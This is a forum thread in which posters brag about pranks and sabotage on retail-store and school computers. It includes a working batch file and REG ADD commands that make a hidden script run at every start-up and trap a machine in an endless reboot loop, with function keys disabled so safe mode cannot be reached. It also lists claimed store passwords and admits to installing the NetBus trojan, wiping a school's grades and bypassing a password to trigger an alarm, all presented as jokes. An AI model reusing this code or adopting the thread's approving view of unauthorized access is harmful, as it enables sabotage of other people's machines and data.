your awsome hacking skills!

Recommended Posts

Well i got really bored at circuit city today, and they were logged in as the HP_OWNER. Opened Regedit changed the logonUI to explorer.exe and rebooted.

When XP loaded, it loaded the "My Computer" but you couldnt use the start menu or anything... and when you closed the window, it popped back up.

The guy there was showing the system like 10 min later to another customer and he had no clue why it wasnt working. Heard him say "well the HP computers are crappy, as this example. You should buy this Sony instead"

So what else have you all done to retail/school computers?

basically me and a friend of mine show our computer science teacher every week what's wrong with the security in school... and help to fix the holes... so we're the good kind of hackers I suppose... :p

(on a side note... one particular pc got infected with 378 spy/adware thingies according to ad-aware SE :p)

Nothing big at all...

Changed the screensaver on a PC in Curry's to a scrolling marquee "This PC only ?200 + Monitor TODAY ONLY!"

Stood back and watched people enquire.

As I say, hardly anything but earned me a laugh.

wow thats a nice idea. i'll have to try that. of course, its pretty harmless, but a good laugh would be cool.

Best buy pw is Best Buy or admin. lol

Well best buy ****ed me off last week so heres what I did. hehe

I created batch file:

@echo off

ConsoleTool /HIDE

TITLE Eat **** ****ers

shutdown -r -t03 -c "**** Best Buy"

ConsoleTool /HIDE hides the command window. hehe Put consoletool on a disk and stick in %systemroot%/system32. hehe

I did three secs to they could see it for a split sec. before computer reboots. lol

I then put a call in all registry runs to run the patch file and in autoexec and a few other uncommon places so it runs on every system start up. lol

Oh and i disabled all F keys on the keyboard so they cant enter safe mode to disable it.

lol Sure they had fun with this one.

So you know i installed then ran it and it just makes the computer continue to reboot forever. lol

Of course this happens after you logon so you can get rid but most of them are dumb asses.

But now I do before loging in via RunOnceEx.

So my batch file re adds it to runoncex again after running. lol

Heres part. ;)

SET KEY=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx

REG ADD %KEY% /V TITLE /D "**** Best Buy" /f

REG ADD %KEY%\055 /VE /D "This computer is a pos of **** u know!!!" /f

REG ADD %KEY%\055 /V 1 /D "%systemdrive%\system32\df093nx9d8x.cmd" /f

Oh and the batch file is of course hidden.

 hehe once I come into one big store I put windows version on desktop via regedit of course and when the seller see he don't know how to get rid of it LOL    he stay a lot of time trying select and delete this info rofl

oh school oh ok

Well changed the entire school grades to Zeros..yeap all 2039 students. hehe

I was nice and left a backup file. And told them out to fix the security problem. How nice of me.

Also set the alarm off durning a test once. I was a student aid for an admin. so i had access to the school security system. Was pretty easy since he was running windows 98 and little ctrl exscape bypasses the pw screen. lol

That and in the libary i but net bus on every single pc. About 80 of them. And made all the drives open. That was funny. People thought they were going crazy. lol

Other then that nothing as i try to spend the least amount of time humanly possiable at school. Exspically now in college. Computer science major at USC btw. :)

Well i did not do but in one class in 11th some students in my class put a porn movie on the teachers computer. Shes uses power point. So he installed some micro that would run a porn video when she opened power point. He turned up the speakers pretty lound. Was pretty funny since he put animal porn on it envolving a hourse. lol Pretty sick.

All the Best Buys around here have interactive demos, which can be circumvented by using CTRL-M. While I haven't done anything to their computers, what is more interesting is what the actual employees do to the computers. In a bunch of the laptops for example (mainly the ones they don't want to sell) they'll run lots of programs to make the unit seem slower, disable devices so they claim things like "oh the burners on these things always seem to break" and the even simpler turning down the lcd brightness to say the screen is of poorer quality. They do the same thing with tv's, their audio systems etc, in order to push people towards products with higher margins. How's that for hacking?

Well for my school board they use a utility, called deep freeze that returns the PC to it's original state on reboot. Well I found out the password for my school, and as a result found out the password format for the entire school board, I told another kid and he ended up changing a couple to screen savers to tell a teacher that "they" were coming for him, he got caught, ended up dropping my name so the vps called me down, they were a bit ****ed, worried about damages and all that, but overall they were pretty good, actually the tech admin was pretty amused and laughed at how ****ed the shortsighted admins at the board office would be. It wasn't even hard. LoL
